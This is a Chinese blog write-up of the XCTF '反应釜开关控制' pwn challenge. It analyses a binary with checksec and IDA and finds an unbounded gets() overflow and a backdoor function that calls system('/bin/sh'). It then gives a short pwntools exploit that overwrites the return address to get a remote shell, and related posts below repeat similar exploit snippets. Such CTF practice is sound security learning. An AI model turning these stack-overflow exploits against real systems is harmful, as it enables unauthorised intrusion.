攻防世界 Pwn 反应釜开关控制

最新推荐文章于 2023-06-03 10:36:20 发布
最新推荐文章于 2023-06-03 10:36:20 发布
阅读量416 收藏
点赞数
分类专栏: Pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MrTreebook/article/details/121887419
版权

攻防世界 Pwn 反应釜开关控制

1.题目下载地址

点击下载

2.checksec

在这里插入图片描述
只开启了NX,并且是64位程序

3.IDA分析

在这里插入图片描述

  • 看到一个gets函数,并且没有边界限制
  • 存在溢出可以利用
  • 再往下看其他的函数
  • 虽然题目给了很多函数,但是没开canary,没开PIE
  • 没有什么难度,直接ret到后门函数即可
    在这里插入图片描述
.text:00000000004005F6                 public shell
.text:00000000004005F6 shell           proc near               ; DATA XREF: normal+4E↓o
.text:00000000004005F6 ; __unwind {
.text:00000000004005F6                 push    rbp
.text:00000000004005F7                 mov     rbp, rsp
.text:00000000004005FA                 mov     edi, offset command ; "/bin/sh"
.text:00000000004005FF                 call    _system
.text:0000000000400604                 nop
.text:0000000000400605                 pop     rbp
.text:0000000000400606                 retn
.text:0000000000400606 ; } // starts at 4005F6
.text:0000000000400606 shell           endp

所以 addr_binsh = 4005F6
再去看一下溢出量
在这里插入图片描述

0x200+8

4.exp

from pwn import *
#sh=process('./control')
sh=remote('124.126.19.106','53303')
sh.recvuntil('>')
payload=0x208*'a'+p64(0x4005F6)
sh.sendline(payload)
sh.interactive()

在这里插入图片描述

==Microsoft==
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
1.反应釜开关控制
weixin_44864859的博客
07-27 367
1.反应釜开关控制 拿到这道题,ida分析之后感觉是有些奇怪的,因为题目就是简单的栈溢出,而且给了后门函数。所以就是简单的ret2text。 exp: from pwn import * context(log_level='debug',arch='amd64',os='linux') r = remote('220.249.52.133',37791) elf = ELF('./kaiguan') shell_addr = 0x04005F6 payload = 'A'*0x208 + p64(she
非预期解 |攻防世界 pwn进阶 反应釜开关控制
Kni9hT's Blog
04-20 984
文章目录菜鸡独白0x00.看题0x01.查看保护0x02.懵...非预期0x03.后记 菜鸡独白 好久没做题了,看大佬们天天在朋友圈晒比赛成绩,不由感叹WTCL! 今天下午无聊继续刷起ADworld。 0x00.看题 题目描述:小M在里一个私人矿厂中发现了一条TNT生产线中硝化反应釜的接口,反应釜是一种反应设备,非常的不稳定,会因为很多原因造成损坏,导致生产被迫停止。她怀疑这个工厂可能进行地下军火...
攻防世界 pwn——反应釜开关控制
CNS-Enterprise BCC-1701-J
06-03 302
攻防世界 做题练习
[攻防世界]反应釜开关控制
逆向萌新的博客
06-21 429
[攻防世界]反应釜开关控制
攻防世界高手进阶区 ——反应釜开关控制
weixin_62675330的博客
02-11 468
攻防世界高手进阶区 ——反应釜开关控制 题目没什么信息。在这里插入图片描述 1.分析文件 运行一下,可能为栈溢出的题。 checkse 无栈溢出保护,无地址随机化,只有堆栈不可执行。 栈溢出可能性大。 ida64 int __cdecl main(int argc, const char **argv, const char **envp) { char s[64]; // [rsp+0h] [rbp-240h] BYREF char v5[512]; // [rsp+40h] [
攻防世界PWN刷题-反应釜开关控制
m0_53932372的博客
12-30 2009
反应釜开关控制 思路:没有开启pie,并且直接有system("/bin/sh"); 和ret2text方法一样。 exp: #!/usr/bin/python from pwn import * p = remote(“111.200.241.244”,52515) payload=b’a’*512+b’b’*8+p64(0x00004005F6) p.sendline(payload) p.interactive() ...
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
[攻防世界 pwn]——反应釜开关控制
Y_peak的博客
02-23 336
[攻防世界 pwn]——反应釜开关控制 题目地址:https://adworld.xctf.org.cn/ 题目: 无言以对,直接给你shell函数,返回覆盖到shell函数就OK了 exploit from pwn import * p = remote("111.200.241.244",31931) payload='a' * (0x200 + 8)+p64(0x4005F6) p.sendlineafter('>',payload) p.interactive() ...
反应釜开关控制(xctf)
weixin_43868725的博客
05-24 729
0x0 程序保护和流程 保护: 流程: main() gets明显存在栈溢出。又在函数列表中找到了shell()函数。 0x1 利用过程 直接覆盖return的地址payload=0x208*‘a’+p64(0x4005F6) exp from pwn import * #sh=process('./a') sh=remote('124.126.19.106','53303') sh.recvuntil('>') payload=0x208*'a'+p64(0x4005F6) sh.sendli
xctf-pwn-“反应釜开关控制 & 实时数据监测 & greeting-150“
njh18790816639的博客
07-31 332
反应釜开关控制pwn题目逻辑较为简单。 通过三次栈溢出,可以得到shell函数地址。 发现PIE保护没有开启,其实这里是直接可以栈溢出到shell函数的地址的,不必弄那么复杂! 这道题目的PIE应该是忘记开了,题目原本设计的目的是想让我们使用三次栈溢出来得到shell的。 分界线 这里我感觉应该不是这么简单的,所以我又去进行寻找资料,发现是XCTF 4th-CyberEarth里面的盲打题。意味着我们没有ELF文件,所以我们就没有办法来想这么简单的去做出来。 实时数据监测 发现什么保护都没有
[XCTF-pwn] 3-反应釜开关控制
weixin_52640415的博客
03-03 145
溢出到后门 from pwn import * p = remote('111.200.241.244', 53046) p.sendline(flat(b'A'*(0x200+8), 0x4005f6)) p.interactive()
64位程序rop链构造|攻防世界pwn进阶区 pwn-100
Kni9hT's Blog
03-16 4014
文章目录前言利用思路0x01.ida调试发现sub_40063D函数可以溢出0x02.cyclic计算溢出需要填充72字节0x03.checksec看一下保护0x04.利用思路:0x05.可以用vmmap查找binary文件地址0x06.用 `ROPgadget --binary pwn100 --only "pop|ret" | grep rdi`命令寻找ROP0x07.32位程序和64位程序...
关于PWN调节小灯泡亮暗
记得提醒我去学习
03-17 2992
再次感谢ReCclay大佬文章的启迪: 《觉得自己再有必要开一篇PWM的文章了》 作者:ReCclay [如果想要更深入详细了解PWN,请务必点击这篇文章↑↑↑↑] 实验原理: 通过上图就可以 看出,占空比越高,高电平越久,小灯泡就越暗 (这里高电平小灯泡灭,低电平小灯泡亮) 所以只要控制占空比,就可以控制小灯泡的亮暗了 代码: 先设置一个10us的定时器 void Timer0Init() ...
PWN入门(1)基础知识和环境设置
Ba1_Ma0的博客
09-07 4395
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用。
格式化字符串利器fmtstr_payload | 攻防世界 pwn进阶区 实时数据监测
Kni9hT's Blog
04-21 6550
文章目录0x00.看题0x01.检查保护0x02.利用fmtstr_payload构造payload 0x00.看题 健身回来,继续刷第二题,貌似和上一题一个风格啊。连名字都差不多,偏工业实际。不过这一题学到了一个新东西,fmtstr_payload. 题目描述:小A在对某家医药工厂进行扫描的时候,发现了一个大型实时数据库系统。小A意识到实时数据库系统会采集并存储与工业流程相关的上千节点的数据...
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值